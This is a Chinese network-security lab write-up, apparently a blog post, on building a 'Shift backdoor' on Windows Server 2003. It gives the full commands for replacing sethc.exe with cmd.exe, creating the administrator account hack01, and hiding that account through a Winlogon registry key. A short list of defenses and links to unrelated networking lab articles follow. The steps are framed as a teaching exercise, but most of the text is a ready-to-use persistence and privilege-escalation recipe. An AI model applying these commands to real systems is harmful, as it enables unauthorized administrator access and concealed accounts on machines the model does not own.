网络安全实验十二 window 2003 Shift后门实验

简介: 网络安全实验十二 window 2003 Shift后门实验

一、实验目的

1、了解windows系统中的漏洞

2、了解windows系统漏洞的危害

3、了解windows系统如何预防漏洞带来的危害

4、了解利用windows 2003系统粘滞键漏洞建立后门程序并利用该后门

二、实验环境

实验主机:Windows Server 2003

实验目标服务器:

网络环境:实验室局域网

三、实验内容与实验要求

实验步骤一

Shift后门制作

1、登录win2003实验主机。

2、点击开始 -> 运行,在运行的对话框中输入cmd回车。

3、切换到system32目录下,备份sethc.exe ,依次执行如下命令

1. cd \
2. 
3. cd c:\windows\system32
4. 
5. move sethc.exe sethc.exe.bak

4、将cmd.exe改成为sethc.exe,执行如下命令:

copy cmd.exe sethc.exe

实验步骤二

感受下Shift后门

1、在本地计算机使用mstsc命令远程到该win2003主机。

2、连续按5次shift键,激活后门程序,并执行添加用户等各种操作,输入net user查看当前账户信息。建立账户hack01密码为123456、hack01提取administrators权限、激活hack01账号。依次执行如下命令:

建立账户和密码

net user hack01 123456 /add

查看hack用户是否被添加:

net user

Hack获取administrators账户权限:

net localgroup administrators hack01 /add

激活hack账户:

net user hack01 /active:yes

3、输入账户hack01和密码123456进入目标主机,成功进入说明实验成功。

4、已经成功登录系统了,说明实验已经成功了。

四、实验过程与分析

五、实验结果总结

通过实验我们学习到本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。

防范措施:

(1)禁用shift键的粘滞功能;

(2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。

创建隐藏用户:

创建用户后,按win+r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。

目录
相关文章
|
3月前
计算机网络:思科实验【1-访问WEB服务器】
计算机网络:思科实验【1-访问WEB服务器】
102 2
计算机网络:思科实验【1-访问WEB服务器】
|
4月前
|
网络协议 算法 网络安全
EVE-NG强大的网络模拟器和实验平台
随着网络技术的迅猛发展,人们对网络安全和网络性能问题的关注日益增加。在这个领域中,EVE-NG作为一种备受欢迎的网络模拟器和实验平台,备受青睐。
|
5月前
|
网络协议 算法 网络安全
EVE-NG:一种强大的网络模拟器和实验平台
随着网络技术的飞速发展,网络安全和网络性能问题越来越受到人们的关注。在这个领域,EVE-NG是一种广受欢迎的网络模拟器和实验平台。
|
5月前
|
网络协议 应用服务中间件 Linux
Linux网络综合基础实验
Linux网络综合基础实验
67 0
|
2月前
|
弹性计算 网络协议 关系型数据库
网络技术基础阿里云实验——企业级云上网络构建实践
实验地址:<https://developer.aliyun.com/adc/scenario/65e54c7876324bbe9e1fb18665719179> 本文档指导在阿里云上构建跨地域的网络环境,涉及杭州和北京两个地域。任务包括创建VPC、交换机、ECS实例,配置VPC对等连接,以及设置安全组和网络ACL规则以实现特定服务间的互访。例如,允许北京的研发服务器ECS-DEV访问杭州的文件服务器ECS-FS的SSH服务,ECS-FS访问ECS-WEB01的SSH服务,ECS-WEB01访问ECS-DB01的MySQL服务,并确保ECS-WEB03对外提供HTTP服务。
网络技术基础(19)——PPPoE实验
【3月更文挑战第5天】该文介绍了PPPoE拨号上网的模拟实验。通过运营商提供的PPPoverEthernet服务,设备可以动态获取内网地址并连接到Internet。实验包括服务器和客户端的配置:服务器设置地址池、认证账号和虚拟模板,并绑定到物理接口;客户端配置拨号规则、虚拟拨号口及内网网关,以实现永久在线连接。实验结果显示,客户端成功通过Dialer接口连接到服务器,实现了上网功能。
|
2月前
|
网络虚拟化
计算机网络VLAN实验
计算机网络VLAN实验
|
3月前
|
网络协议 网络架构
计算机网络:思科实验【5-IPv4地址——分类地址与划分子网】
计算机网络:思科实验【5-IPv4地址——分类地址与划分子网】
|
3月前
|
安全 数据库 网络虚拟化
计算机网络:思科实验【4-生成树协议STP及虚拟局域网VLAN】
计算机网络:思科实验【4-生成树协议STP及虚拟局域网VLAN】